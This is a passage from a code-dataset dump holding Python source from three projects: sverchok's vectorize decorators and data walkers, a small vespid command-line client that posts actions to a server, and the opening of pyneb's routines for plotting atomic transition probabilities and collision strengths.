self.outputs[0].sv_set(out1)\n self.outputs[1].sv_set(out2)\n \"\"\"\n\n # this condition only works when used via \"@\" syntax\n if func is None:\n return lambda f: vectorize(f, match_mode=match_mode)\n\n @wraps(func)\n def wrap(*args, **kwargs):\n\n # it's better not to use positional arguments for backward compatibility\n # in this case a function can get new arguments\n if args:\n raise TypeError(f'Vectorized function {func.__name__} should not have positional arguments')\n\n walkers = []\n for key, data in zip(kwargs, kwargs.values()):\n if data is None or data == []:\n walkers.append(EmptyDataWalker(data, key))\n else:\n annotation = func.__annotations__.get(key)\n nesting_level = _get_nesting_level(annotation) if annotation else 0\n walkers.append(DataWalker(data, output_nesting=nesting_level, mode=match_mode, data_name=key))\n\n # this is corner case, it can't be handled via walk data iterator\n if all([w.what_is_next() == DataWalker.VALUE for w in walkers]):\n return func(*args, **kwargs)\n\n out_number = _get_output_number(func)\n\n # handle case when return value of decorated function is simple one value\n if out_number == 1:\n out_list = []\n for match_args, result in walk_data(walkers, [out_list]):\n match_args, match_kwargs = match_args[:len(args)], match_args[len(args):]\n match_kwargs = {n: d for n, d in zip(kwargs, match_kwargs)}\n func_out = func(*match_args, **match_kwargs)\n if not is_empty_out(func_out):\n result[0].append(func_out)\n return out_list\n\n # the case when return value is tuple of multiple values\n else:\n out_lists = [[] for _ in range(out_number)]\n for match_args, result in walk_data(walkers, out_lists):\n match_args, match_kwargs = match_args[:len(args)], match_args[len(args):]\n match_kwargs = {n: d for n, d in zip(kwargs, match_kwargs)}\n func_out = func(*match_args, **match_kwargs)\n [r.append(out) for r, out in zip(result, func_out) if not is_empty_out(out)]\n return out_lists\n\n def is_empty_out(value):\n if value is None:\n return True\n try:\n return not bool(len(value))\n except TypeError:\n return False\n\n return wrap\n\n\ndef devectorize(func=None, *, match_mode=\"REPEAT\"):\n \"\"\"It takes list of values of arbitrary shape, flatten it\n and call the decorated function once with flattened data\n This needs for functions (nodes) which breaks vectorization\"\"\"\n\n # this condition only works when used via \"@\" syntax\n if func is None:\n return lambda f: vectorize(f, match_mode=match_mode)\n\n @wraps(func)\n def wrap(*args, **kwargs):\n\n # it's better not to use positional arguments for backward compatibility\n # in this case a function can get new arguments\n if args:\n raise TypeError(f'Vectorized function {func.__name__} should not have positional arguments')\n\n walkers = []\n for key, data in zip(kwargs, kwargs.values()):\n if data is None or data == []:\n walkers.append(EmptyDataWalker(data, key))\n else:\n annotation = func.__annotations__.get(key)\n nesting_level = _get_nesting_level(annotation) if annotation else 0\n walkers.append(DataWalker(data, output_nesting=nesting_level - 1, mode=match_mode, data_name=key))\n\n flat_data = {key: [] for key in kwargs}\n for match_args, _ in walk_data(walkers, []):\n match_args, match_kwargs = match_args[:len(args)], match_args[len(args):]\n [container.append(data) for container, data in zip(flat_data.values(), match_kwargs)]\n\n return func(**flat_data)\n\n return wrap\n\n\ndef _get_nesting_level(annotation) -> int:\n \"\"\"It measures how many nested types the annotation has\n simple annotations like string, float have 0 level\n list without arguments gives 1 level\n List[list] such thing returns 2 level\"\"\"\n if not hasattr(annotation, '__origin__'):\n if annotation in [list, tuple]:\n return 1\n elif annotation in [float, int, bool, Matrix, str]:\n return 0\n\n elif annotation.__origin__ is list:\n return 1 + _get_nesting_level(annotation.__args__[0])\n elif annotation.__origin__ is tuple:\n # not sure how this should act if arguments of the tuple have different level of nesting\n return 1 + max([_get_nesting_level(arg) for arg in annotation.__args__])\n\n raise NotImplementedError(f'Given annotation: {annotation} is not supported yet')\n\n\ndef _get_output_number(function):\n \"\"\"Returns number of arguments returning by given function\n the function should have returning annotation with Tuple value - Tuple[list, list]\"\"\"\n annotation = function.__annotations__.get('return')\n if annotation:\n if hasattr(annotation, '__origin__') and annotation.__origin__ == tuple:\n if hasattr(annotation, '__args__'):\n return len(annotation.__args__)\n return 1\n\n\ndef _what_is_next_catch(func):\n \"\"\"It's exclusively for using in DataWalker class for optimization performance\"\"\"\n\n @wraps(func)\n def what_is_next_catcher(self):\n next_val_id = id(self._stack[-1])\n if next_val_id not in self._catch:\n # this should not conflict with float, string, integer and other values\n self._catch[next_val_id] = func(self)\n return self._catch[next_val_id]\n\n return what_is_next_catcher\n\n\nclass DataWalker:\n \"\"\"This class allows walk over a list of arbitrary shape like over a tree data structure\n Input data can be a value or list\n the list can include values and / or other lists\n the value itself can be just a number, list of numbers, list of list of numbers etc.\n values should be consistent and should not include other values\n for example inside list of vertices there should be other lists of vertices or any thing else\n there is no way of handling such data structure efficiently\"\"\"\n\n # match modes\n SHORT, CYCLE, REPEAT, XREF, XREF2 = \"SHORT\", \"CYCLE\", \"REPEAT\", \"XREF\", \"XREF2\"\n\n # node types\n VALUE, END, SUB_TREE = \"VALUE\", \"END\", \"SUB_TREE\"\n\n EXIT_VALUE = type('ExitValue', (), {'__repr__': lambda s: \"<ExitValue>\"})()\n\n def __init__(self, data, output_nesting=0, mode=REPEAT, data_name=None):\n self.match_mode = mode\n\n self._stack = [data]\n self._output_nesting = output_nesting\n self._name = data_name\n\n self._catch = dict() # for optimization\n\n def step_down_matching(self, match_len, match_mode):\n # todo protection from little nesting\n if self.what_is_next() == DataWalker.SUB_TREE:\n current_node = self._stack.pop()\n elif self.what_is_next() == DataWalker.VALUE:\n current_node = [self._stack.pop()]\n else:\n raise RuntimeError(f'Step down is impossible current position is: {self._stack[-1]}')\n\n self._stack.append(DataWalker.EXIT_VALUE)\n self._stack.extend(list(reversed(self._match_values(current_node, match_len, match_mode))))\n\n def step_up(self):\n if self.what_is_next() != DataWalker.END:\n raise RuntimeError(f'There are still values to read: {self._stack}')\n self._stack.pop()\n\n def pop_next_value(self):\n return self._stack.pop()\n\n # this method is used most extensively\n @_what_is_next_catch\n def what_is_next(self):\n if self._stack[-1] is DataWalker.EXIT_VALUE:\n return DataWalker.END\n if isinstance(self._stack[-1], (list, tuple, np.ndarray)):\n nesting = levels_of_list_or_np(self._stack[-1])\n else:\n nesting = 0\n if nesting == self._output_nesting:\n return DataWalker.VALUE\n else: # todo add the case when next element has too less nested levels\n return DataWalker.SUB_TREE\n\n @property\n def next_values_number(self):\n try:\n if self.what_is_next() == DataWalker.VALUE:\n return 1\n last = self._stack[-1]\n return len(last)\n except (IndexError, TypeError):\n return 0\n\n @property\n def is_exhausted(self):\n return not bool(self._stack)\n\n @staticmethod\n def _match_values(data, match_len, match_mode):\n if len(data) > match_len:\n return data[:match_len]\n elif len(data) == match_len:\n return data\n else:\n if match_mode == DataWalker.REPEAT:\n return list(data) + [data[-1]] * (match_len - len(data)) # todo deepcopy ??\n # todo add other modes\n\n def __repr__(self):\n return f\"<DataWalker {self._name if self._name else 'data'}: {self._stack}>\"\n\n\nclass EmptyDataWalker:\n \"\"\"Use this (instead of DataWalker) if a channel does not has any data\n It is needed not to overcomplicate logic of DataWalker\"\"\"\n\n def __init__(self, data=None, data_name=None):\n self._data = data\n self._name = data_name\n\n def step_down_matching(self, *_, **__):\n pass\n\n def step_up(self):\n pass\n\n def pop_next_value(self):\n return self._data\n\n def what_is_next(self):\n return DataWalker.VALUE\n\n @property\n def next_values_number(self):\n return 0\n\n @property\n def is_exhausted(self):\n return True\n\n def __repr__(self):\n return f\"<EmptyDataWalker {self._name if self._name else 'data'}: {self._data}>\"\n\n\nclass ListTreeGenerator:\n \"\"\"Generates tree from nested lists with step up/down interface\"\"\"\n def __init__(self, root_list):\n self.data = root_list\n self._stack = [root_list]\n\n def step_down(self):\n new_node = []\n self._stack.append(new_node)\n\n def step_up(self):\n last_node = self._stack.pop()\n if last_node and self._stack:\n current_node = self._stack[-1]\n current_node.append(last_node)\n\n @property\n def current_list(self):\n return self._stack[-1]\n\n def __repr__(self):\n return f'<TreeGen data: {self.data}>'\n\n\ndef walk_data(walkers: List[DataWalker], out_list: List[list]) -> Tuple[list, List[list]]:\n \"\"\"It walks over data in given walkers in proper order\n match data between each other if necessary\n and gives output containers where to put result of handled data\"\"\"\n match_mode = DataWalker.REPEAT # todo should be determined by modes of input walkers\n result_data = [ListTreeGenerator(l) for l in out_list]\n\n # first step is always step down because walkers create extra wrapping list (for the algorithm simplicity)\n max_value_len = max(w.next_values_number for w in walkers)\n [w.step_down_matching(max_value_len, match_mode) for w in walkers]\n\n while any(not w.is_exhausted for w in walkers):\n if all(w.what_is_next() == DataWalker.VALUE for w in walkers):\n yield [w.pop_next_value() for w in walkers], [t.current_list for t in result_data]\n elif any(w.what_is_next() == DataWalker.END for w in walkers):\n [w.step_up() for w in walkers]\n [t.step_up() for t in result_data]\n elif any(w.what_is_next() == DataWalker.SUB_TREE for w in walkers):\n max_value_len = max(w.next_values_number for w in walkers)\n [w.step_down_matching(max_value_len, match_mode) for w in walkers]\n [t.step_down() for t in result_data]\n","repo_name":"nortikin/sverchok","sub_path":"utils/vectorize.py","file_name":"vectorize.py","file_ext":"py","file_size_in_byte":13837,"program_lang":"python","lang":"en","doc_type":"code","stars":2098,"dataset":"github-code","pt":"54"} +{"seq_id":"40655964622","text":"from cProfile import run\nfrom typing import Optional\nimport typer\nimport json\nimport requests\nimport logging\nimport os\n\nimport sys\n_VESP_PATH = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))).replace('\\\\', '/')\nsys.path.append(_VESP_PATH)\n\nfrom common.error import *\n\nlocalenv_path = _VESP_PATH + \"/core/cli/localenv\"\napp = typer.Typer()\nlocalenv = json.load(open(localenv_path, 'r'))\nfiletype_map = {\n\t'js': 'jsnative',\n\t'c': 'cnative'\n}\n\n@app.command()\ndef seturl(url: str = typer.Argument(...)):\n\tr = requests.get(url=url)\n\tif r.status_code == 200:\n\t\tlocalenv[\"VESPID_URL\"] = url\n\t\ttyper.echo(f\"Connected to {url}\")\n\t\tjson.dump(localenv, open(localenv_path, 'w'))\n\telse:\n\t\ttyper.echo(f\"{url} not found\")\n\n@app.command()\ndef isconnected():\n\tif \"VESPID_URL\" in localenv:\n\t\ttyper.echo(f\"Connected to {localenv['VESPID_URL']}\")\n\telse:\n\t\ttyper.echo(f\"not connected\")\n\n\ndef process_filename(filename):\n\tfilename, extension = filename.split('.')\n\tif extension in filetype_map:\n\t\treturn filetype_map[extension]\n\telse:\n\t\traise InvalidRuntimeError()\n\n@app.command()\ndef create(vname: str = typer.Argument(...), filename: str = typer.Argument(...)):\n\t\"\"\"\n\tCreate an action\n\t\"\"\"\n\ttry:\n\t\tif \"VESPID_URL\" in localenv:\n\t\t\turl = localenv['VESPID_URL']\n\t\telse:\n\t\t\traise Exception()\n\t\tvcode = open(filename, 'r').read()\n\t\truntime = process_filename(filename)\n\t\tif runtime not in {'c', 'js', 'cnative', 'jsnative'}:\n\t\t\traise InvalidActionError(\"Unknown runtime: {}\".format(runtime))\n\t\tdata = {\n\t\t\t'vcode': vcode,\n\t\t\t'runtime': runtime\n\t\t}\n\t\theaders = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n\t\tr = requests.post(\"{}/actions/{}/create\".format(url, vname), data=json.dumps(data), headers=headers)\n\t\tif r.status_code == 200:\n\t\t\ttyper.echo(r.json()['result'])\n\t\telif r.status_code == 500:\n\t\t\ttyper.echo(r.json()['msg'])\n\n\texcept Exception as e:\n\t\tlogging.error(e)\n\n@app.command()\ndef invoke(vname: str = typer.Argument(...), args: str = typer.Argument(...)):\n\t\"\"\"\n\tInvoke an action\n\t\"\"\"\n\ttry:\n\t\tif \"VESPID_URL\" in localenv:\n\t\t\turl = localenv['VESPID_URL']\n\t\telse:\n\t\t\traise Exception()\n\t\tdata = json.dumps({\n\t\t\t'vargs': eval(args)\n\t\t})\n\t\theaders = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n\t\tr = requests.post(\"{}/actions/{}/invoke\".format(url, vname), data=data, headers=headers)\n\t\tif r.status_code == 200:\n\t\t\ttyper.echo(r.json()['result'])\n\t\telif r.status_code == 500:\n\t\t\ttyper.echo(r.json()['msg'])\n\n\texcept Exception as e:\n\t\tlogging.error(e)\n\n@app.command()\ndef get(vname: str = typer.Argument(...)):\n\t\"\"\"\n\tGet an action\n\t\"\"\"\n\ttry:\n\t\tif \"VESPID_URL\" in localenv:\n\t\t\turl = localenv['VESPID_URL']\n\t\telse:\n\t\t\traise Exception()\n\t\theaders = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n\t\tr = requests.post(\"{}/actions/{}/get\".format(url, vname), headers=headers)\n\t\tif r.status_code == 200:\n\t\t\ttyper.echo(r.json()['result'])\n\t\telif r.status_code == 500:\n\t\t\ttyper.echo(r.json()['msg'])\n\n\texcept Exception as e:\n\t\tlogging.error(e)\n\n@app.command()\ndef list(playgroundid: str = typer.Argument(...)):\n\t\"\"\"\n\tList actions\n\t\"\"\"\n\ttry:\n\t\tif \"VESPID_URL\" in localenv:\n\t\t\turl = localenv['VESPID_URL']\n\t\telse:\n\t\t\traise Exception()\n\t\theaders = {'Content-type': 'application/json', 'Accept': 'text/plain'}\n\t\tdata = json.dumps({\n\t\t\t'playgroundId': playgroundid\n\t\t})\n\t\tr = requests.post(\"{}/actions/list\".format(url), headers=headers, data=data)\n\t\tif r.status_code == 200:\n\t\t\ttyper.echo(r.json())\n\t\telif r.status_code == 500:\n\t\t\ttyper.echo(r.json()['msg'])\n\n\texcept Exception as e:\n\t\tlogging.error(e)\n\n\nif __name__ == \"__main__\":\n app()","repo_name":"virtines/vespid","sub_path":"core/cli/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7057189555","text":"\"\"\"@module plotAtomicData\nModule to plot the atomic data\n\"\"\" \n\nimport pyneb as pn\nimport numpy as np\nif pn.config.INSTALLED['plt']:\n import matplotlib as mpl\n import matplotlib.pyplot as plt\n from matplotlib.ticker import MaxNLocator\n\nfrom pyneb.utils.misc import int_to_roman, parseAtom\n\nclass DataPlot(object):\n \"\"\"\n Plot transition probabilities and collision strengths from different data sets\n \n \"\"\"\n def __init__(self, elem=None, spec=None, all_data=[], atom=None, n_tem_points=10000, \n ref_tem=None, OmegaInterp='linear',NLevels=None):\n \"\"\"\n Parameters:\n elem: atomic elem \n spec: ionization stage in spectroscopic notation (I = 1, II = 2, etc.)\n atom: e.g. 'O3'\n all_data: dictionary of all_data to be compared (see above for format)\n n_tem_points: number of points in the fit (default=100; increase if fit is not smooth)\n ref_tem: array of temperature values to be signaled in the plots\n OmegaInterp: interpolating function between Omega values ('Cheb' [default], 'Linear')\n \n **Example:**\n \n dataplot = pn.DataPlot('O', 3) # initializes the plot\n \n dataplot.plotA() # transition probabilities plot \n \n dataplot.plotRelA() # relative transition probabilities plot\n \n dataplot.plotOmega() # collision strength plot \n\n \n \"\"\"\n colors = np.array(['r', 'g', 'b', 'm', 'c', 'y'])\n self.calling = 'DataPlot'\n if atom is not None:\n self.atom = str.capitalize(atom)\n self.elem = parseAtom(self.atom)[0]\n self.spec = int(parseAtom(self.atom)[1])\n else:\n self.elem = str.capitalize(elem)\n self.spec = int(spec)\n self.atom = self.elem + str(self.spec)\n\n old_data = pn.atomicData.getDataFile(self.atom)\n # Check if matplotlib installed\n if not pn.config.INSTALLED['plt']:\n pn.log_.warn('Matplotlib not installed!', calling=self.calling)\n\n # Separate omega and A data sets \n atom_data = []\n coll_data = []\n if all_data == []:\n all_data = pn.atomicData.getAllAvailableFiles(self.atom, mark_current=False)\n i_colors = 0 \n for file_ in all_data:\n ID = file_.split('_')[-1]\n type_ = (file_.split('_')[2]).split('.')[0]\n if type_ in ['atom', 'coll']:\n data_list = type_ + '_data'\n vars()[data_list].append({'ID': ID, 'file_': file_, 'type': type_, 'color': colors[i_colors % len(colors)]})\n i_colors += 1\n \n self.atom_data = atom_data\n self.coll_data = coll_data\n\n # Temperature values to be signaled by vertical lines in omega plots. Can be changed by defining ref_tem\n if ref_tem is None:\n self.ref_tem = np.log10([5000., 10000., 20000.]) \n else:\n self.ref_tem = ref_tem\n\n # If it's not standard effective collision strengths, we don't want it\n coll_data_temp=[]\n for item in self.coll_data: \n coll_data_temp.append(item)\n for data in coll_data_temp:\n pn.atomicData.setDataFile(data['file_'])\n atom = pn.Atom(self.elem, self.spec, OmegaInterp=OmegaInterp, NLevels=NLevels)\n \"\"\"\n try:\n if 'O_UNIT' in atom.CollData.comments.keys():\n self.coll_data.remove(data)\n except:\n pass\n \"\"\"\n # For each data set, an atom is built. \n del(atom)\n for data in self.atom_data + self.coll_data:\n pn.atomicData.setDataFile(data['file_'])\n atom = pn.Atom(self.elem, self.spec, OmegaInterp=OmegaInterp, NLevels=NLevels)\n data['atom'] = atom\n for data in old_data:\n if data is not None:\n pn.atomicData.setDataFile(data)\n self.atom_rom = (self.elem + '_' + int_to_roman(int(self.spec))).lower()\n self.n_tem_points = n_tem_points\n\n self.atom_n_max = 0\n for at in self.atom_data:\n if at['atom'].atomFileType != 'chianti':\n if at['atom'].atomNLevels > self.atom_n_max:\n self.atom_n_max = at['atom'].atomNLevels\n self.coll_n_max = 0\n for at in self.coll_data:\n if at['atom'].collFileType != 'chianti':\n if at['atom'].collNLevels > self.coll_n_max:\n self.coll_n_max = at['atom'].collNLevels\n \n def plotA(self, save=False, figsize=(18, 12), fignum=None, NLevels=None):\n \"\"\"\n Plot the log of the A values of each data set \n \n **Parameters:**\n save: if True, saves the plot in a file\n figsize: figure size (default: [18, 12])\n fignum: figure Number\n\n \"\"\"\n if NLevels is None:\n atom_n_max = self.atom_n_max\n else:\n atom_n_max = NLevels\n if not pn.config.INSTALLED['plt']:\n pn.log_.error('Matplotlib not installed!', calling=self.calling)\n plt.figure(fignum, figsize=figsize)\n plt.clf()\n ax = plt.subplot(111)\n x = np.arange(atom_n_max * (atom_n_max - 1) / 2.)\n ticks = x\n # Inventory of markers. Chosen to be distinguished even when overlapped\n mark = ['<', (5, 1), '>', 'o', '|']\n i_marker = 0\n # Background colors to distinguish lower levels \n bg_color = 'grbymc' \n tick_label = []\n \n for i in range(atom_n_max - 1):\n # x0, x1 are start and end points of each level\n x0 = i * (atom_n_max - 1) - i * (i - 1) / 2 - 0.5\n width = atom_n_max - i - 1\n x1 = x0 + width\n plt.axvspan(x0, x1, facecolor=bg_color[i%6], alpha=0.05)\n # The x axis must stretch the maximum range (although some data set might have a lower n_level)\n for j in range(i + 1, atom_n_max):\n tick_label.append('(' + str(j + 1) + ', ' + str(i + 1) + ')')\n\n\n for data in self.atom_data:\n n_levels = data['atom'].atomNLevels\n Ay = []\n A = data['atom'].getA()\n color = data['color']\n try:\n for i in range(n_levels - 1):\n for j in range(i + 1, n_levels):\n if A[j, i] > 0:\n Ay.append(np.log10(A[j, i]))\n else:\n Ay.append(np.NaN)\n plt.scatter(x, Ay, marker=mark[i_marker], s=300., c=color, alpha=0.35, linewidths=1, label='%s' % (data['ID']))\n ax.set_xticks(ticks)\n except:\n pn.log_.warn('Problem in plotting A', calling=self.calling + '.plotA')\n i_marker += 1\n ax.set_xticklabels(tick_label)\n\n # Plot features\n plt.xlabel('Transition')\n plt.ylabel('Log A(j, i)')\n plt.title('Transition probabilities for [%s %s]' % (self.elem, int_to_roman(int(self.spec))))\n plt.legend(loc='lower right', markerscale=1., scatterpoints=1, borderpad=1, labelspacing=1)\n plt.show() \n if save:\n plt.figure(figsize=[18, 12])\n plt.savefig(self.atom_rom + '_' + data['ID'] + \"-\" + self.ref_data + \"_A.pdf\")\n\n\n\n def plotAllA(self, save=False, figsize=(18, 12), fignum=None, NLevels=None):\n \"\"\"\n Plot the log of the A values of each data set \n \n Parameters:\n save: if True, saves the plot in a file\n figsize: figure size (default: [18, 12])\n fignum: figure Number\n\n \"\"\"\n if NLevels is None:\n atom_n_max = self.atom_n_max\n else:\n atom_n_max = NLevels\n if not pn.config.INSTALLED['plt']:\n pn.log_.error('Matplotlib not installed!', calling=self.calling)\n fig = plt.figure(fignum, figsize=figsize)\n plt.clf()\n max_y_ticks = 6\n ticks = np.arange(len(self.atom_data)+1)[1:] \n \n A = np.zeros([len(self.atom_data), atom_n_max, atom_n_max])\n color=[]\n for i, data in enumerate(self.atom_data):\n A_tmp = data['atom'].getA()\n if A_tmp.shape[0] > atom_n_max:\n A[i, :] = A_tmp[0:atom_n_max, 0:atom_n_max]\n else:\n A[i, 0:A_tmp.shape[0], 0:A_tmp.shape[1]] = A_tmp\n color.append(data['color'])\n \n A[np.where((A<=0))] = np.NaN\n lgA = np.log10(A)\n \n x = ticks\n color = np.array(color)\n for j in range(2, atom_n_max+1):\n for i in range(1, j):\n y = lgA[:, j-1, i-1]\n ax = plt.subplot(atom_n_max - 1, atom_n_max - 1, (atom_n_max-1)*(j-2) + i)\n ax.set_xticks(x)\n plt.xlim((min(x)-0.5, max(x)+0.5))\n ax.yaxis.set_major_locator(MaxNLocator(max_y_ticks-1))\n try:\n plt.scatter(x, y, c=color, label='_nolegend_', s=40, edgecolor='None')\n lbl = '({0} -> {1})'.format(j,i)\n ax.text(0.95, 0.95, lbl, fontsize=10, color=\"#660066\", transform=ax.transAxes, ha=\"right\", va=\"top\") \n except:\n pn.log_.warn('Problem with plotting a subplot {} {}'.format(i,j), calling=self.calling)\n if (j==atom_n_max) & (i==1): \n plt.xlabel('Reference #', fontsize=8)\n plt.ylabel('Log(A$_{ji}$)', fontsize=8)\n plt.subplots_adjust(left=0.15, right=0.95, top=0.95, bottom=0.12)\n plt.gca().get_yaxis().get_major_formatter().set_useOffset(False)\n ax.set_xticks(x)\n \n #fig.text(.5, .05, \"i (lower level)\", fontsize=12, ha='center', color=\"#660066\", va='top')\n #fig.text(.05, .5, \"j (upper level)\", ha='left', va='center', fontsize=12, color=\"#660066\", rotation=90)\n title = \"Available transition probabilities for {0} {1}\".format(self.elem, int_to_roman(int(self.spec)))\n fig.text(.5, .95, title, color=\"#191970\", fontsize=14, ha='center')\n for i, data in enumerate(self.atom_data):\n x_txt = .95\n y_txt = .85 - .04*i \n fig.text(x_txt, y_txt, \"Ref. %d: %s\" %(i+1, data['ID']), color=color[i], ha = 'right') \n\n plt.tight_layout(pad=0.1)\n if save:\n plt.savefig(self.atom_rom + \"_all_As.pdf\")\n \n plt.show() \n \n\n def plotRelA(self, ref_data=None, save=False, figsize=None, fignum=None, NLevels=None, fig=None):\n \"\"\"\n Plot the relative difference of the A of each data set with respect to the reference one\n\n Parameters:\n ref_data: reference data set for comparing transition probabilities (default=first data ID)\n save: if True, save the plot in a file (default: False)\n figsize: figure size (default: [18, 12])\n fignum: figure number\n\n \"\"\"\n if NLevels is None:\n atom_n_max = self.atom_n_max\n else:\n atom_n_max = NLevels\n if not pn.config.INSTALLED['plt']:\n pn.log_.error('Matplotlib not installed!', calling=self.calling)\n # Commented out because it produced an extra, empty frame - VL 30 Jul 2015\n #if fig is None:\n # fig = plt.figure(fignum, figsize=figsize)\n #plt.clf()\n ticks = range(atom_n_max + 1)[1:]\n\n # The As of the reference data set are stored\n if ref_data is None:\n ref_data = self.atom_data[0]['ID']\n for data in self.atom_data:\n if (data['ID'] is ref_data):\n ref_A = data['atom'].getA()\n # Only non-zero values are taken into account to prevent dividing by zero\n nonzero_ref_A_indexes = np.nonzero(ref_A)\n\n for data in self.atom_data:\n if (data['ID'] is not ref_data):\n A = data['atom'].getA()\n try:\n # The data to be compared might have fewer levels than the reference one. Only the ones in common are considered.\n tmp_indexes = np.asarray(nonzero_ref_A_indexes) \n up_indexes = tmp_indexes[0][tmp_indexes[0] < data['atom'].atomNLevels]\n lo_indexes = tmp_indexes[1][tmp_indexes[0] < data['atom'].atomNLevels]\n # Indexes for which the reference data set is not zero\n ref_indexes = (up_indexes, lo_indexes)\n # Ratio of A/A_ref for non-zero A_ref values\n A_ratio = A[ref_indexes] / ref_A[ref_indexes]\n nonzero_A_ratio_indexes = np.nonzero(A_ratio)\n rel_A = np.log10(A_ratio[nonzero_A_ratio_indexes])\n # Plotting starts\n #fig = plt.figure()\n if fig is None:\n fig = plt.figure(fignum, figsize=figsize)\n plt.clf()\n ax = plt.subplot(111)\n fig.subplots_adjust(top=0.9)\n # Physical levels = array levels + 1\n x = np.asarray(lo_indexes) + 1\n y = np.asarray(up_indexes) + 1\n # Size is proportional to difference between As\n # Numerical value of size adjusted empirically, no particular meaning \n size = np.multiply(10000., np.abs(rel_A))\n # A different color is assigned to data points depending on whether they are smaller or larger\n # than the reference data.\n # The ratio is not compared to exactly one to include only truly different values \n index_grt = np.where(rel_A > 0.0000)\n color_grt = np.array(['#FF8C00']).repeat(x[index_grt].size)\n index_sml = np.where(rel_A <= 0.0)\n color_sml = np.array(['#FF1480']).repeat(x[index_sml].size)\n # The range is adjusted to include only values for which there is a difference\n xmin = np.max([np.min(x[index_sml]), np.min(x[index_grt])])\n xmax = np.min([np.max(x[index_sml]), np.max(x[index_sml])])\n ax.set_xticks(ticks)\n ax.set_xlim((xmin - 0.25, xmax + 0.25)[:])\n # The x-axis is plotted on the top to mimic the data array in the fits file\n for tick in ax.xaxis.get_major_ticks():\n tick.label1On = False\n tick.label2On = True\n ymin = np.min([np.min(y[index_sml]), np.min(y[index_grt])])\n ymax = np.max([np.max(y[index_sml]), np.max(y[index_sml])])\n ax.set_yticks(ticks)\n # The y axis increases downward to mimic the data array in the fits file\n ax.set_ylim((ymin - 0.25, ymax + 0.25)[::-1])\n # Fake points, just to generate the labels (I don't know how to generate a reasonable label\n # for data points with markers of different size)\n plt.scatter(x[index_grt][0], y[index_grt][0], marker='o', s=.0002, c=color_grt[0],\n label='Positive (max = %.2f)' % (np.max(rel_A)))\n plt.scatter(x[index_grt][0], y[index_grt][0], marker='o', s=.0002, c=color_sml[0],\n label='Negative (min = %.2f)' % (np.min(rel_A)))\n # True data; size reflects divergence from reference data, color whether positive or negative\n plt.scatter(x[index_grt], y[index_grt], marker='o', s=size[index_grt], c=np.asarray(color_grt), alpha=1.0)\n plt.scatter(x[index_sml], y[index_sml], marker='o', s=size[index_sml], c=np.asarray(color_sml), alpha=1.0)\n # X-axis label \n ax.text(.5, 1.05, '$i$ (lower level)', transform=ax.transAxes, ha='center', va='bottom')\n #plt.xlabel('$i$ (lower level)')\n # Y-axis label\n plt.ylabel('$j$ (upper level)')\n # Legend\n plt.legend(loc='upper right', markerscale=1000., scatterpoints=1, borderpad=1,\n labelspacing=1, prop=dict(size=12), title=u'Log (%s / %s)' % (data['ID'], ref_data))\n # Plot title\n ax.text(.5, -.10, \"Relative difference between $A$s data for [%s %s]\" \n % (self.elem, int_to_roman(int(self.spec))),\n transform=ax.transAxes, ha='center', va='bottom', color='#191970', size=12)\n except:\n pn.log_.warn('Problem in plotting relA', calling='DatasetPlot')\n\n if save:\n plt.savefig(self.atom_rom + '_' + data['ID'] + \"-\" + ref_data + \"_relA.pdf\")\n \n plt.show() \n\n\n def plotOmega(self, save=False, figsize=(18, 12), fignum=1, scan_orders=None, NLevels=None,\n fig=None):\n \"\"\"\n Plot the tabulated collision strengths of each data set and the fit that is performed by PyNeb\n \n Parameters:\n save: Boolean. Determine if the plot is automatically saved in a file (default: False)\n figsize: List. figure size in inches (default: [18, 12])\n fignum: Figure Number DEPRECATED!!!\n scan_orders: = None or (min_order, max_order) or (min_order, -1) to go until the max. DEPRECATED!!!\n fig: DEPRECATED!!!\n \"\"\"\n if NLevels is None:\n coll_n_max = self.coll_n_max\n else:\n coll_n_max = NLevels\n # Plotting range somewhat larger than actual data range (less tight) \n if not pn.config.INSTALLED['plt']:\n pn.log_.error('Matplotlib not installed!', calling=self.calling)\n if fig is None:\n #fig = plt.figure(fignum, figsize=figsize)\n fig, axes = plt.subplots(coll_n_max-1, coll_n_max-1, figsize=figsize)\n plt.autoscale(tight=False)\n # I need two \n first = True\n first_done = False\n \n legend_text = []\n legend_lines = []\n \n axes_plotaxis = np.zeros_like(axes, dtype=bool) \n# style_dic = ['-', '--', '-.', ':'] * 10\n for data in self.coll_data:\n # tem_points = tabulated temperature points (different for each data set)\n tem_points = self.tem_in_K(data['atom'].tem_units, data['atom'].getTemArray())\n tem_min = min(tem_points)\n tem_max = max(tem_points)\n # tem_funct = array of temperature values for which the fit is evaluated\n tem_funct = np.linspace(tem_min, tem_max, self.n_tem_points)\n x_dots = np.log10(tem_points)\n x_lines = np.log10(tem_funct)\n if 'COEFF' in data['atom'].CollData.comments.keys():\n coeff = float(data['atom'].CollData.comments['COEFF'])\n else:\n coeff = 1.0\n # Loops over all levels\n for i in range(1, coll_n_max+1):\n for j in range(i + 1, coll_n_max+1): \n # N levels require an N-1 x N-1 array of plots\n # The subplots are arranged in rows and columns according to the upper and lower levels\n ax = axes[j-2, i-1]\n axes_plotaxis[j-2, i-1] = True\n if (i <= data['atom'].collNLevels) and (j <= data['atom'].collNLevels):\n y_dots = data['atom'].getOmega(tem_points, j, i)\n try:\n if 'O_UNIT' not in data['atom'].CollData.comments:\n y_dots = coeff * data['atom'].getOmegaArray(j, i)\n if y_dots.sum() > 0.0:\n ax.plot(x_dots, y_dots, color=data['color'],\n marker='*', linestyle='None', label='_nolegend_', markersize=10)\n \n y_dots = data['atom'].getOmega(tem_points, j, i)\n if y_dots.sum() > 0.0:\n ax.plot(x_dots, y_dots, color=data['color'],\n marker='o', linestyle='None', label='_nolegend_')\n y_lines = data['atom'].getOmega(tem_funct, j, i)\n if y_lines.sum() > 0.:\n ax.plot(x_lines, y_lines,\n color=data['color'], label='_nolegend_')\n except:\n pn.log_.warn('Problem with plotting a data set', calling=self.calling)\n# Draws vertical lines at selected temperature values (only once for each subplot, hence \"first\") \n if (first and (data['atom'].collNLevels == coll_n_max)):\n for tem in self.ref_tem:\n ax.axvline(tem, c='blue', alpha=0.4, ls=':')\n lbl = \"$\\Omega$\" + \"(\" + str(j) + \",\" + str(i) + \")\"\n ax.text(0.95, 0.95, lbl, transform=ax.transAxes, ha=\"right\", va=\"top\") \n first_done 